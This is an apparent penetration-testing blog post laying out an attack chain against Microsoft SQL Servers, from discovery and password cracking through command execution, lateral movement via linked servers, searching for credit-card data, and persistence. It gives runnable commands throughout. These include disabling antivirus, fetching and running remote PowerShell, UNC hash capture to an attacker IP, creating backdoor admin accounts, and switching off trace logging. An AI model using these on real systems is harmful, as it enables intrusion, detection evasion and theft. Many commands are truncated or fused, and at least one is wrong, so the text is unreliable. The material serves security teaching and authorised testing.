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Attacking Modern Environments With MSSQL Server SPs

The document discusses techniques for attacking MS-SQL servers, including enumeration methods for unauthenticated, local, and domain users as well as privilege escalation and exploitation tactics. It provides detailed explanations of SQL fundamentals and a lab setup guide.

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Attacking Modern Environments With MSSQL Server SPs

The document discusses techniques for attacking MS-SQL servers, including enumeration methods for unauthenticated, local, and domain users as well as privilege escalation and exploitation tactics. It provides detailed explanations of SQL fundamentals and a lab setup guide.

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Attacking Modern Environments with

MS-SQL Servers
Updated: Jun 20, 2022

Lately I've spent some time learning existing research on attack techniques for MS-SQL Servers,
specifically for Red Team engagements & Penetration Tests and I'm very excited to share what
I've learnt with all of you.

This post will provide you with an insight into the attack surfaces of Microsoft SQL Servers.
I'll touch upon relevant techniques (along with tools and commands) for each phase of the kill
 @nikhil_mitt - Pentester Academy
 Scott Sutherland - NetSPI

Table of Contents
1. Introduction
- MS-SQL Fundamentals
- Lab Setup Guide

2. Enumeration
- Unauthenticated User
- Local User
- Local Administrator
- Domain User
- Auth via Bruteforce
- Auth via Valid Accounts
- Enumeration via Database
- Automated Enumeration

3. Privilege Escalation
- Kerberoasting
- UNC Path Injection
- Impersonation
- Trustworthy Databases
- Automated Audit

4. Exploitation
- OS Command Execution
- SQL Links
- Shared Service Accounts
- Sensitive Data on SQL Servers

5. Persistence
- Startup Stored Procedures
- Registry Modification
- Malicious Triggers


Why should we consider targeting MS-SQL Servers when we're performing a Red Team or an
Assumed Breach Pentest?
 The majority of organizations base their database infrastructure on SQL Servers.
 Since it integrates really well with Windows & AD, the trust relationships can
be leveraged for Lateral Movement.
 From an OPSEC perspective, most Blue Teams will have detections in place at
the OS & network level but may not be as strictly monitored at the database
 SQL Service often runs with Local Admin privileges. This means when you
execute commands as a SQL service, you have a really good chance of moving
laterally and escalating privileges within the domain as we will see soon.
Before we get started with all of the hackeries, let's first understand a few important concepts
within MS-SQL servers.

MS-SQL Fundamentals

The SQL Service is like any other Windows process and runs in the context of the Service

During the installation of MS-SQL Service, you choose an account(Managed Service account or
a Domain account are mostly used in domain environments to integrate with Kerberos), and
thereafter all of the interactions with the underlying OS take place in the context of this account.

For instance, if this account is privileged, and if you execute SQL injection queries via
'xp_cmdshell', you have those privileges when you execute OS commands.

SQL Server Accounts

At a high level we have the following three SQL Server Accounts:

1. Windows account (i.e domain accounts - mapped to SQL Server Login)
2. SQL Server Login (exists inside SQL server. Eg: sa)
3. Database User (exists inside SQL server - to access data within DB)
To sign in to an SQL server one can use:
 Windows account → maps to SQL Server Login → maps to DB user →
access to data
 SQL Server login → maps to DB user → access to data
The screenshot below shows how one would configure authentication for SQL servers ("Mixed
Mode" in most cases). Below which, one sets the password for the 'sa' account (SQL Server
Login account). Think of this as the administrator account. Following this, at least one domain
account is mapped to the 'sysadmin' role.

In the case of Windows account, the SQL server does not prompt for a password. Authentication
is handled by Kerberos. Post auth → You are mapped to a SQL Server role.
In the case of SQL Server Login, authentication is handled by the SQL Server. Post auth → You
are mapped to a SQL Server role.
Post authentication, you can see the SQL Server Logins including the ones we configured during

SQL Roles

There are two kinds of SQL roles:

 Server Roles
 Database Roles
Windows accounts and SQL Server Logins are mapped to a server-level role. Think of these
as groups. The privileges you have will depend on which role(s) you've been given. There are 9
server-level roles, however, in most cases, you will come across the following roles:
 sysadmin - Perform any activity on the server. (Think admin account)
 public - Least privileged - Every SQL Server login belongs to this role by default
(Think "Everyone" domain group) - able to connect & list DBs
For instance, let's say we want to give our organization's DB admin(ben.doe) the 'sysadmin'
server-level role. You can configure the same within SQL Server Login options. The same can
be done for a domain group. Note the 'public' role is checked by default.
Post authentication, to access data within the DB, you need to have a DB-level role. Database-
level roles are database-wide in their permissions scope. We are interested in the below DB-
level roles:
 db_owner: Perform all configuration activities on the database. (Think admin of
the DB)
 public: Least privileged - Every database user belongs to this role by default.

LAB Setup Guide

To set up your lab environment follow the steps provided here.

Lab components include:
• Virtual Machines: Domain Controller + Workstation
• SQL Express Setup:
 Set up SPN for a Domain User account
 Install SQL Service as the above account
 Set up Firewall Rules
• SQL Management Studio
• Heidi SQL


There are multiple techniques to locate and enumerate MS-SQL servers as a:

 Unauthenticated User
 Local User
 Local Admin
 Domain User
Let's say you've been tasked with a Red Team engagement and you have to gain access to an
organization's network. So you go on-site and find out there's Guest WiFi without a password.
You happily login to the guest network and get to know there's no network segmentation
between the guest network and the internal network. Let's try to find if there are any SQL servers
on the network and enumerate them.

Unauthenticated User
 Port Scanning: TCP/UDP Scan
By default, SQL servers listen on TCP 1433 and UDP 1434. The port scanning tools mentioned
below perform a TCP/UDP scan and queries hosts on these ports for SQL servers.
Get-Content targets.txt | Get-SQLInstanceScanUDP –Threads 10

#Nmap: nmap -sU --script=ms-sql-info

#Metasploit: use auxiliary/scanner/mssql/mssql_ping

#PowerSploit: Invoke-Portscan -StartAddress <IP> -EndAddress <IP> -ScanPort 1433 –Verbose

 UDP Broadcast
We use SqlDataSourceEnumerator class to load the Instance.GetDataSources() static method to
send a UDP request across the local broadcast network and any SQL servers listening will

#osql / sqlcmd:
sqlcmd /L
 Open shares/ Repositories
During the OSINT phase, enumerate public repositories for connection strings and DB
Enumerate the internal network for open shares. These may contain configuration files for
connection strings which may be used for authentication.

Local User

To check if there's a SQL service running as a local user you can use:
 Registry Enumeration
Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Microsoft SQL Server'
- Service Enumeration
 Service Enumeration
Get-Service -Name *MSSQL*

Get-SQLInstanceLocal | Get-SQLConnectionTest

 Local Privilege Escalation via JuicyPotato can help elevate to LOCAL SYSTEM.

Local Administrator

If you're able to elevate to Local Admin privileges on a server running a SQL service, you can
get access to the database using the following techniques:

 Read LSA Secrets

With SYSTEM privileges to a host, you can access Local Security Authority secrets, which
can contain a variety of different credential materials, such as credentials for service accounts.
LSA secrets are stored in the registry at HKEY_LOCAL_MACHINE\SECURITY\Policy\

 Dump WDigest/NTLM Hashes from memory

#Enable WDigest
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential
/t REG_DWORD /d 1
After a user logs on, the system generates and stores a variety of credential materials in
LSASS process memory. With SYSTEM privileges you can access credential material stored in
the process memory of the Local Security Authority Subsystem Service (LSASS).
If you're unable to crack the password hash, you can enable WDigest by registry modification
to lower the security of how credentials are stored in memory. Once enabled every subsequent
login onto that host stores its password in cleartext.

 Token Impersonation
With local admin privileges, one can check for tokens of the SQL service account and
impersonate them so that you can gain access privileges and run commands as that user.

 Dump local MS-SQL server hashes from a Windows system if you don't have
access to this database.
The tool "osql" is installed with Microsoft SQL Server and the option "-E" will try to
authenticate on the database with your current Windows login account.
#MSSQL 2000:
osql -E -Q "SELECT name,password frommaster.dbo.sysxlogins"

#MSSQL 2005
osql -E -Q "SELECT name,password_hash FROMsys.sql_logins"

Domain User
 SPN Scanning
Assuming you have access to a domain user, you can perform SPN Scanning. SPN scanning is
fast and reliable at finding all SQL servers in the domain. (port scanning is limited by network
restrictions). It relies on how services are configured in Active Directory:

- Every service that is enabled for Kerberos authentication must have a Service Principal
- SPN is a unique identifier of a service instance in an AD forest.
- SPN scanning performs service discovery via LDAP queries to a Domain Controller.
- It returns a list of SQL Server instances discovered by querying a domain controller for
systems with registered MSSQL* Service Principal Names (SPNs).


#Check network accessibility

Get-SQLInstanceDomain | Get-SQLConnectionTestThreaded

#Check for read privs

Get-SQLInstanceDomain | Get-SQLServerInfo

Authentication via Brute-force

It's always a good idea to check for weak passwords for SQL Server Logins.

Invoke-SQLAuditWeakLoginPw - By default, will only test the login as the password, and
"password" as the password. So only two passwords will be attempted for each enumerated
login. However, custom user and password lists can be provided.
Get-SQLServerLoginDefaultPw - Checks for default credentials on SQL Server instances used
by 3rd party applications. If the instance name is a known 3rd party, the corresponding
password is tried. A few instance names and their passwords are given below:



ACT7 sa/sa


RTCLOCAL sa/mypasswo



use auxiliary/scanner/mssql/mssql_login

$targets = (GetSQLInstanceDomain).ComputerName
$targets | Invoke-BruteForce -UserList users.txt -PasswordList pass.txt -Service SQL

Authentication via Valid Accounts

Let's say you've identified valid credentials, you can use the following tools:
Get-SQLInstanceDomain | Get-SQLConnectionTestThreaded -Username sa -Password

#Check with privileges of an alternate domain user:

runas /noprofile /netonly /user:<domain\user> powershell.exe
Get-SQLInstanceDomain | Get-SQLConnectionTestThreaded

#Metasploit: use auxiliary/scanner/mssql/mssql_login

#Impacket: mssqlclient.py -p 1433 @ -windows-auth

#Sqsh: sqsh -S -U sa -P Password

#Sqlcmd: sqlcmd –S -U
Enumeration via Database
 Blind SQL Server & Domain Enumeration
The "suser_name()" function returns the principal name for a given principal ID. All you
need is the 'public' DB role i.e all domain users can use this function.

For instance, the principal ID(1) corresponds to' sa' and principal ID(259) corresponds to
'HOME\sql_admin' in our lab environment.

PowerUpSQL automates this process by fuzzing all Principal IDs to return the
corresponding principal names from the database.
Get-SQLFuzzServerLogin -Instance
Get-SQLFuzzDomainAccount -Instance
Additional SQL server logins identified can be targets for brute-force attacks for weak
passwords. In our case, we've identified 'Joe', 'Joey' and 'trustedjoe' apart from default SQL
Server logins.

You can take this a step ahead and enumerate all domain users, groups and more. For more
information refer NetSPI's blog.
 Database Enumeration
Alright! Assuming you've got your hands on a set of working credentials, what are some basic
commands to enumerate the database? You may be familiar with the below commands if you've
exploited a classic SQL injection vulnerability.
#Server version:
SELECT @@version

#Current Server Login (relevant for SQLi attacks):


#Current DB Role:

#Enumerate sysadmin privs:


#List DB Users and Roles:

select rp.name as database_role, mp.name as database_user from sys.database_role_members
drmjoin sys.database_principals rp on (drm.role_principal_id = rp.principal_id)join
sys.database_principals mp on (drm.member_principal_id = mp.principal_id)

#Current DB:
SELECT db_name()

#List DBs:
SELECT name FROM master..sysdatabases

#List tables:

#Extract table contents:

use ;select * from dbo.

#Extract Password Hash(requires 'sa'):

Get-SQLServerPasswordHash -Verbose -Instance

Automated Enumeration
If you'd like to automate the process of enumeration of privileges, you can use PowerUpSQL's
Invoke-SQLDumpInfo. This cmdlet can be used to quickly inventory databases, privileges
and other information and stores them as CSV files which then can be used to create a report.
Invoke-SQLDumpInfo -Verbose -Instance "<Instance Name>"

Privilege Escalation

So now you've completed your enumeration phase → identified SQL server instances on the
network → identified SQL server logins → let's assume you have found a set of valid
credentials. We will now look into various misconfigurations which can be abused for the
elevation of privileges.


In order to understand how kerberoasting works, one needs to understand how authentication is
handled within Active Directory. I'd recommend reading the reference link for a detailed

Basically what we're doing is we request a TGS for our SQL Service from the Domain
Controller, which is encrypted with the NTLM hash of the SQL service account. Once we
receive the TGS, we brute-force it against a list of weak passwords and if the password in use
is present in the wordlist, we can gain access to the SQL Server.

In order to increase your chances of cracking a hash with hashcat use:

 Mask attacks: If we're able to identify the minimum character length from the
domain's password policy, you can use mask attacks to narrow down all
possibilities based on common patterns
 Rulesets: If you want to use a well-known ruleset instead, you can use
#Request a TGS
#with Impacket:
GetUserSPNs.py -dc-ip /

#with Invoke-Kerberoast.ps1
Invoke-Kerberoast -Identity -OutputFormat hashcat | % { $_.Hash } | Out-File -Encoding
ASCII hashes.txt

#Crack hashes with Hashcat:

hashcat.exe -a 3 -m 5600 hashes.txt -1 ?l?d?u -2 ?u ?2?1?1?1?1?1?1 -o cracked.txt –O
hashcat -m 13100 hash.txt Pass-wordlist.txt –force -r rules/OneRuleToRuleThemAll.rule --
debug-mode=1 --debug-file=matched.rule

UNC Path Injection

A UNC path uses double slashes or backslashes to precede the name of the computer. For
instance: \\server-name\shared-resource
UNC paths are used to access remote file servers under the context of the SQL Server service
account. Within SQL Servers, the stored procedures 'xp_dirtree' and 'xp_fileexist' accept file
paths. These stored procedures are available to members of the 'public' role by default.
If we can point these to our Capture Server where we'll have a listener set up with Responder, the
SQL server tries to access the share and authenticate to it, which is where we can extract the
SQL service account's password hash and crack/relay it.

Hence by default, the public role(i.e every domain user) has direct access to the SQL Server
service account's NetNTLMv2 password hash.
xp_dirtree \\< Attacker-IP>\
xp_fileexist \\<Attacker-IP>\
For a detailed guide on how to perform LLMNR Poisoning & relay attacks with Responder\
Inveigh refer:
 byt3bl33d3r.github.io
 infinitelogins.com
In the screenshot below, I've used the 'xp_dirtree' stored procedure to fetch a file from our
listener server, which then obtains the NTLMv2 hash of the SQL service account.

In the screenshot below, I've used the 'xp_dirtree' stored procedure to relay the hash onto another
host(SMB-Signing should be disabled) where the SQL server apparently had administrative
privileges. In this case, NTLMRelayx, by default dumps the local SAM database.

The 'EXECUTE AS' statement is a feature within SQL servers that allows a user to
impersonate and execute commands as another SQL Server login or database user. This
allows database admins to delegate permissions to other users to execute certain stored
procedures without necessarily giving them the sysadmin role.

Execution context is reverted to the original caller only after execution of the procedure or when
a REVERT statement is issued. By default, this permission is implied for 'sysadmin' for all
databases and 'db_owner' role members in databases that they own.
Always check for impersonation chains. For example, User A can impersonate User B. User B
can impersonate 'sa’.

Note when you run the 'xp_cmdshell' stored procedure while impersonating a user all of the
commands are still executed as the SQL Server service account, NOT the SQL Server login or
impersonated domain user. So even if the sysadmin can impersonate the Domain Admin within
the SQL server, OS commands are still executed in the context of the SQL service account.
#Find SQL Server Logins that can be impersonated:
SELECT distinct b.name FROM sys.server_permissions a INNER JOIN sys.server_principals b ON
a.grantor_principal_id = b.principal_id WHERE a.permission_name = 'IMPERSONATE
In the screenshot above, SQL Login 'Joe' can impersonate 'Joey' & 'sa'. Let's try to switch our
execution context to these users.
#Impersonate the server level permissions of a login:
EXECUTE AS LOGIN = '<user>';

However, if we try to execute commands as 'sa', the SQL server gives us an error.
This is a good indicator to check for impersonation chains.

Current user: Joe → Impersonates Joey (not sysadmin) →Impersonates sa (is sysadmin)

Trustworthy Databases

The database property 'is_trustworthy_on' is used to indicate whether a SQL Server

instance trusts a database and its contents. The property is turned off by default as a security
measure. When TRUSTWORTHY is off, impersonated users will only have database-scope
permissions but when TRUSTWORTHY is turned on, impersonated users can perform
actions with server-level permissions.

This isn’t always bad, but when sysadmins create trusted databases and don’t change the owner
to a lower privileged user the risks start to become noticeable. This allows writing procedures
that can execute code that uses server-level permission. If the TRUSTWORTHY setting is set
to ON, and if a sysadmin is the owner of the database, it is possible for a user with the
db_owner role to elevate privileges to sysadmin.
Attack Flow:
- Sysadmin is the database owner (dbo) of the database.
- Current/impersonated user has db_owner role [i.e Admin privileges in the database]
- We create a stored procedure that can EXECUTE AS OWNER.
- Executed stored procedure adds the user to the sysadmin role!
#Enumerate TRUSTWORTHY database:
SELECT name as database_name, SUSER_NAME(owner_sid) AS database_owner, is_trustworthy_on AS
TRUSTWORTHY from sys.databases

#Enumerate for db_owner role within a DB:

SELECT DP1.name AS DatabaseRoleName, isnull (DP2.name, 'No members') AS DatabaseUserName
FROM sys.database_role_members AS DRM RIGHT OUTER JOIN sys.database_principals AS DP1 ON
DRM.role_principal_id = DP1.principal_id LEFT OUTER JOIN sys.database_principals AS DP2 ON
DRM.member_principal_id = DP2.principal_id WHERE DP1.type = 'R' ORDER BY DP1.name;
#Create a stored procedure to add ‘trustedjoe’ to sysadmin role:
USE SecretDB
EXEC sp_addsrvrolemember 'trustedjoe' , 'sysadmin'

#Delete procedure afterwards:

DROP PROCEDURE <procedurename>;

Automated Audit
If you'd like to automate the checks for common high impact vulnerabilities and weak
configurations using the current login’s privileges, use PowerUpSQL's Invoke-SQLAudit.
All of the techniques that we discussed can be identified with this script as shown in the
screenshots below.
Invoke-SQLAudit -Instance '<Instance>'

Recalling our initial Red Team scenario where:

 We gained access to the Guest WiFi network → Found SQL Login credentials via
weak passwords / misconfigured Share drive → Able to impersonate an 'sa' user
 or maybe we were given a Domain account → Access & cracked the hash of the
SQL Service account via Kerberoasting\UNC Path injection.
Let's assume that we have sysadmin privileges at this point. How do we leverage this to elevate
privileges within the domain and perform lateral movement as well as extract sensitive
data to demonstrate impact to our clients.

OS Command Execution

With sysadmin privileges on a SQL Server, it is possible to execute OS level commands on the
server as:
1. SQL Server service account in almost all cases when running as:
 Local user, local admin, SYSTEM, Network service, Local managed service
 Domain user, domain admin, domain managed service account.
2. Agent service account for agent jobs. (Disabled by default)

'xp_cmdshell' Stored Procedure

In SQL Server, stored procedures are basically chunks of SQL code intended for reuse that
get compiled into a single execution plan. Similar to functions, they can accept parameters and
provide output to the user. The 'xp_cmdshell' is a commonly abused stored procedure in SQL
servers to execute OS-level commands. This is disabled by default but can be enabled with
'sysadmin' privileges.
#If the xp_cmdshell stored procedure has been dropped but the .dll has not #been deleted, any
of following will re-install it:
EXEC sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
EXEC sp_addextendedproc xp_cmdshell,'C:\Program Files\Microsoft SQL Server\MSSQL\Binn\
EXEC sp_addextendedproc 'xp_cmdshell', 'xplog70.dll'

#Enable xp_cmdshell
EXEC SP_CONFIGURE 'xp_cmdshell', 1

#Automate on multiple instances:

Invoke-SQLOSCmdExec -Instance -Command whoami

How can we leverage this stored procedure for exploitation?

#Disable AV & get a reverse shell
EXEC xp_cmdshell ‘powershell.exe –c Set-MPPreference –DisableRealTimeMonitoring $true’
EXEC xp_cmdshell 'echo IEX(iwr <https://URL/script.ps1> -UseBasicParsing) | powershell -

#Create a Local Admin

net localgroup administrators janedoe /add

#Enable RDP
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v
fDenyTSConnections /t REG_DWORD /d 0 /f

#Establish an RDP session

xfreerdp /u:janedoe /p:<pass> /cert:ignore /v:<Target> /workarea /drive:/localdir,share
/dynamic-resolution +clipboard

 This method is well known and typically disabled on a production system.

 Blue teams will often monitor the enabling of the procedure.
Note: 'xp_cmdshell' is synchronous. This means if you use this to obtain a reverse shell, as long
as your shell is alive, control will not be returned to the next statement.

Custom Extended Stored Procedures

We can create a stored procedure that replicates the functionality of 'xp_cmdshell'. Note that this
requires writing a file to the disk of the victim SQL server.

In a nutshell, we create a DLL which will execute a custom command → Save the DLL to
an accessible location (UNC path\WebDAV) → Create a stored procedure that loads the
DLL → Execute the newly created stored procedure.

Unfortunately in my testing, I was unable to execute the stored procedure due to an error even
though I had set everything up properly. [Error: "Reason 126: The specified module could not be
found".] If you know how to get past this, please let me know!
Create-SQLFileXpDll -OutFile C:\Files\create_user.dll -Command "net user Hacker
Password1!;net localgroup administrators Hacker /add" -ExportName create_user
Get-SQLQuery -UserName sa -Password Password1 –Instance opssqlsrvone –Query
"sp_addextendedproc 'create_user', '\\\Files\create_user.dll'"
Get-SQLQuery -UserName sa -Password Password1 –Instance <Instance> –Query "EXEC create_user"

sp_dropextendedproc 'create_user'

#Load via WebDAV renamed to .txt

sp_addextendedproc 'create_user', '\\myserver@80\path\create_user.txt

#List existing stored procedures (PowerUpSQL):

Get-SQLStoredProcedureXP -Instance <Instance> -Verbose
Pro tip: This could be used as a Persistence technique as well!

Fileless CLR-based Custom Stored Procedures

Common Language Runtime is basically a run time environment by .NET to execute code.
Assemblies take the form of executables (.exe) or dynamic link library (.dll) files and are the
building blocks of .NET applications. CLR Assembly is a .NET DLL that can be imported into
SQL Server. Once imported, the DLL methods can be linked to stored procedures and
executed via TSQL.
Hence we can execute C# code via the creation of a custom CLR stored procedure on a target
SQL Server with the below advantages:
 Loads a .NET assembly directly into the memory of a SQL Server.
 No disk footprint.
 xp_cmdshell is not required

We'll discuss two ways of using this 'feature':

1. Making Custom CLR DLL for SQL Server (Ideal for shells)
1. Payload creation frameworks (Msfvenom/ ScareCrow) + EDR Protections →
DLL file
2. PowerShell script converts DLL → TSQL queries with DLL as hexadecimal
3. Execute the TSQL queries as a sysadmin.

The below screenshot is an example(executes 'whoami') of the output of the PS script that :
2. Execute custom commands
InvokeSQLOSCmdCLR -Username sa -Password <pass> -Instance <target> -Command '<command'

#SeeCLRly: https://github.com/sekirkity/SeeCLRly
 SeeCLRly enables CLR stored procedures on the SQL Server.
 Loads a .NET assembly into memory.
 Creates a stored procedure (cmd_exec) from the loaded assembly.
Invoke-CmdExec -Server <Target> -Command '<cmd>'
 The above cmdlet passes a specified command to the previously created stored
procedure, where it is then executed.
OPSEC note: Enabling CLR Stored Procedure creates an alert just like 'xp_cmdshell', however,
this isn't as closely monitored.
DROP ASSEMBLY my_assembly

OLE Automation Procedures

OLE stands for Object Linking and Embedding. It allows one application to link objects into
another application. OLE procedures are system procedures that allow the use of COM
using SQL queries. Simply put, COM allows for one application to expose its functionality to
other applications.
OLE automation procedures are turned off by default however they can be turned on with either:
 sysadmin privileges [OR]
 Execute privileges on sp_OACreate & sp_OAMethod
#Enable OLE Automation
sp_configure 'show advanced options', 1;
sp_configure 'Ole Automation Procedures', 1;
#Execute command with 'WScript.Shell' COM object and 'Run' method:
DECLARE @ProgramToRun VARCHAR(255)
SET @ProgramToRun = 'Run("calc.exe")'
EXEC sp_oacreate 'wScript.Shell', @output out
EXEC sp_oamethod @output, @ProgramToRun
EXEC sp_oadestroy @output

#Disable the default trace log files

exec sp_configure 'show advanced options',1;
exec sp_configure 'default trace enabled',0;
declare @i int,@size int;
set @i=1;
select @size = max(traceid) from ::fn_trace_getinfo(default);
while @i <= @size begin
exec sp_trace_setstatus @i,0;
set @i=@i+1;
In the example below, we use WScript.Shell to run 'calc.exe':

For more attack techniques with OLE automation procedures refer:

 Imperva Blog
 malwaremusings.com

Agent Jobs

The SQL Server Agent service is used by SQL Server to execute scheduled tasks. It is
typically used for items such as backing up the SQL Server database or other maintenance tasks.
The agent jobs are scheduled and run under the context of the MSSQL Server Agent
service. By default, this is configured as a 'Network Service' account, but can be more privileged
accounts including domain accounts.

The screenshot below shows how the Agent service is configured on a default SQL installation.
[Also note our lab installation of SQL Server(Express edition) doesn't come with Agent.]
 Agent service needs to be enabled. By default, the service 'Start Mode' is set to
'disabled' when you install SQL Server.
 Requires sysadmin role by default.
 Non-sysadmin roles: SQLAgentUserRole, SQLAgentReaderRole, and
SQLAgentOperatorRole fixed database roles in the msdb database can also be
You can use the following Subsystems (job types):
 Microsoft ActiveX Script (VBScript and Jscript)
 CmdExec
 PowerShell
 SSIS (SQL Server Integrated Services)

#View if SQL Agent service is running:

SELECT servicename,
FROM sys.dm_server_services;

#Enumerate job names, and create similar names to avoid being detected.
SELECT job.job_id, notify_level_email, name, enabled, description, step_name, command,
server, database_name FROM msdb.dbo.sysjobs job
msdb.dbo.sysjobsteps steps
job.job_id = steps.job_id

Get-SQLAgentJob -Instance <target> -username sa -Password <pass> -Verbose
Creating a Job
 Start the SQL Server Agent service (xp_startservice)
 Create Job (sp_add_job)
 Add job step (sp_add_jobstep)
 Run Job (sp_start_job )
 Delete Job (sp_delete_job)

Reference: Optiv Blog

 Using subsystem: Powershell

#Delete job
EXEC dbo.sp_delete_job @job_name = N"PSJob'
Invoke-SQLOSCmdAgentJob –Subsystem PowerShell -Username sa -Password <pass> -Instance ops-
sqlsrvone –Command "<powershell cmd>"
#Using CmdExec subsystem:
USE msdb
EXEC dbo.sp_add_job @job_name = N'cmdjob'
EXEC sp_add_jobstep @job_name = N'cmdjob', @step_name = N'test_cmd_name1',
@subsystem = N'cmdexec', @command = N'cmd.exe /k calc', @retry_attempts =
1, @retry_interval = 5
EXEC dbo.sp_add_jobserver @job_name = N'cmdjob'
EXEC dbo.sp_start_job N'cmdjob';
#EXEC dbo.sp_delete_job @job_name = N'cmdJob'
SQL Links

A database link allows a SQL Server to access external data sources such as other SQL
servers, Oracle databases, excel spreadsheets, and so on. Due to common misconfigurations,
the links, or “Linked Servers”, can often be exploited to traverse database link networks,
gain unauthorized access to data, and deploy shells. In the case of database links between
SQL servers, it is possible to execute stored procedures. Database links work even across
forest trusts.
SQL Server links can be configured in two ways.
 Using the current security context.
 Pre-configured with hard-coded credentials. (This is what we are interested in)

Note: Outgoing RPC connections (rpcout) need to be enabled on links in order to enable
xp_cmdshell on remote linked servers. (Disabled by default)

RPCout issue:
 If xp_cmdshell is not enabled on a linked server, it may not be possible to enable
it even if the link is configured with sysadmin privileges.
 Any queries executed via Openquery() are considered user transactions that don’t
allow reconfigure to be run.
 Enabling xp_cmdshell using sp_configure does not change the server state
without reconfigure and thus xp_cmdshell will stay disabled.
#Enumerate SQL Links: (Check for presence of 1 for DatabaseLinkId)
Get-SQLServerLink -Instance dcorp-mssql –Verbose

#Crawl and list all Links:

Get-SQLServerLinkCrawl -Instance dcorp-mssql –Verbose

#OS Command exec on every hop(depends on privileges):

Get-SQLServerLinkCrawl -Instance dcorp-mssql -Query "xp_cmdshell ‘whoami’ "

#Enable xp_cmdshell via links:

EXECUTE('sp_configure' ''xp_cmdshell'',1;reconfigure;')
AT "dsp-slsrvtwo"
I'd recommend reading NetSPI's Blog to understand how attackers may be able to leverage
misconfigured SQL links to access internal resources from an external network.

SQL Links Attack Path

1. After identifying a SQL injection on the DMZ web application server, User
'Captain Evil' identifies SQL links are configured.
2. He starts following the links from DB1 to DB2 to DB3 to DB4. And after getting
sysadmin permissions on DB4, 'Captain Evil' can execute xp_cmdshell to execute
Powershell and shoot back a reverse shell.
3. So by compromising the web application it’s possible to gain access to a secure
4. Just by following database links using legitimate (i.e. not blocked by internal
ACL etc.) database connections 'Captain Evil' got access to the most critical

Shared Service Accounts

Organizations often utilize a single domain account to run many SQL Servers.

If we compromise a single SQL Service account, we will also have compromised all SQL
servers using that shared account. OS commands executed inside SQL Server run in the
context of the SQL Server service account.
SQL Server service accounts have sysadmin privileges by default. This means sysadmin access
to those databases and possibly administrative access to the underlying OS since SQL services
usually run with local administrator privileges.

Sensitive Data on SQL Servers

Going back to our scenario, we have identified several SQL Servers, gained sysadmin privileges
and exploited them for lateral movement. Let's assume one of the objectives of the Red Team
engagement was to target customer credit card data.

With PowerUpSQL we can easily scale domain SQL DB enumeration for sensitive
information. It samples columns from the DB and checks for certain keywords or patterns.

Key factors to consider when targetting databases:

 Database Name: Databases are often named after the associated application or
the type of data they contain.
 is_encrypted Flag: This tells us if transparent encryption is used. People tend to
encrypt things they want to protect so these databases make good targets.
Transparent encryption is intended to protect data at rest, but if we log in as a
sysadmin, SQL Server will do the work of decrypting it for us.
 Database File Size: The database file size can help you determine if the database
is actually being used. The bigger the database, the more data to sample.

#Get accessible SQL Servers:
$Servers = Get-SQLInstanceDomain | Get-SQLConnectionTestThreaded -Threads 10

#View accessible Servers:

$Accessible = $Servers | Where-Object {$_.Status –eq “Accessible”

#Accessible Databases:
$Databases = $Accessible | Get-SQLDatabaseThreaded –Verbose –Threads 10 –NoDefaults

#DBs with is_encrypted Flag:

$Databases | Where-Object {$_.is_encrypted –eq “TRUE”}

 Automate enumeration of sensitive data:

Get-SQLInstanceDomain -Verbose | Get-SQLColumnSampleDataThreaded –Verbose – Threads 10 –
Keyword “credit,password” –SampleSize 2 –ValidateCC –NoDefaults | ExportCSV –
NoTypeInformation c:\temp\datasample.csv

Below is a breakdown of what the command does:

 It runs 10 concurrent host threads at a time
 It searches accessible domain SQL Servers for database table columns containing
the keywords “card” or “password”
 It filters out all default databases
 It grabs two-sample records from each matching column
 It checks if the sample data contains a credit card number
dataLoc is a GUI based alternative to perform the same:


During red team engagements, one common goal is to maintain access to target
environments while security teams attempt to identify and remove persistence methods.
Detective controls tend to focus on compromised account identification and persistence methods
at the operating system layer. While prioritizing detective control development in those areas is a
good practice, common database persistence methods are often overlooked.

Persistence via SQL Servers - Why?

 The .mdf files that SQL Server uses to store data and other objects such as stored
procedures are constantly changing, so there is no easy way to use File Integrity
Monitoring (FIM) to identify database layer persistence methods.
 Abuse activities are masked under the context of the associated SQL Server
service account. This helps make potentially malicious actions appear more
 It’s very common to find SQL Server service accounts configured with local
administrative or LocalSystem privileges. This means that in most cases any
command and control code running from SQL Server will have local
administrative privileges.
 Very few databases are configured to audit for common Indicators of
Compromise (IoC) and persistence methods.

Startup Stored Procedures

All startup stored procedures run under the context of the 'sa' login, regardless of what login
was used to flag the stored procedure for automatic execution. Even if the 'sa' login is disabled,
the startup procedures will still run under the sa context when the service is restarted.

The native 'sp_procoption' stored procedure can be used to configure user-defined stored
procedures to run when SQL Server is started or when the SQL service is restarted.
#List stored procedures marked for automatic execution
SELECT * FROM sysobjects WHERE type = 'P' AND OBJECTPROPERTY(id, 'ExecIsStartUp') = 1;

#Change DB
USE master

#Create BACKDOOR procedure

EXEC master..xp_cmdshell "net user backdoor 'Password1!' /add"
EXEC master..xp_cmdshell "net localgroup administrators backdoor /add"

#Mark for automatic execution

EXEC sp_procoption @ProcName = 'sp_autops', @OptionName = 'startup', @OptionValue = 'on';

#PowerUpSQL can automate the following:

#Add a SQL Server sysadmin:
Invoke-SqlServer-Persist-StartupSp -SqlServerInstance "MSSQLWIN8" -NewSqlUser Evilsa -
NewSqlPass Pass1!

#Add a local Windows Administrator:

Invoke-SqlServer-Persist-StartupSp -SqlServerInstance " MSSQLWIN8 "NewosUser Evilosadmin1 -
NewosPass Pass3!

#Run custom PS code:

Invoke-SqlServer-Persist-StartupSp -SqlServerInstance " MSSQLWIN8 " -PsCommand "IEX(new-
object net.webclient).downloadstring('/script.ps1')"
Registry Modification

'xp_regwrite' is a native extended stored procedure that you can use to create/modify Windows
registry keys without using xp_cmdshell. Note this executes with the SQL Server service
account’s privileges. (Requires Local Admin privileges)

This technique basically modifies a registry key to perform a certain action based on an
event. This could be when a user logs in, or when the system restarts or even when a pre-
configured key is entered.

 To execute a command each time a user logs in using

registry key:
Get-SQLPersistRegRun -Name Evil -Command 'powershell.exe -C "<command>"' -Instance

 Setting a debugger for accessibility options.

We configure a debugger for utilman.exe (Shortcut key: windows key+u), which will run
cmd.exe when it’s called. After the registry key has been modified, it’s possible to RDP to
the target and launch cmd.exe with the 'windows key+u' key combination.

With this, no user interaction is required to execute commands as SYSTEM.

Note if network-level authentication(NLA) is enabled, you won’t have enough access to see the
login screen and you may have to consider other options for command execution.
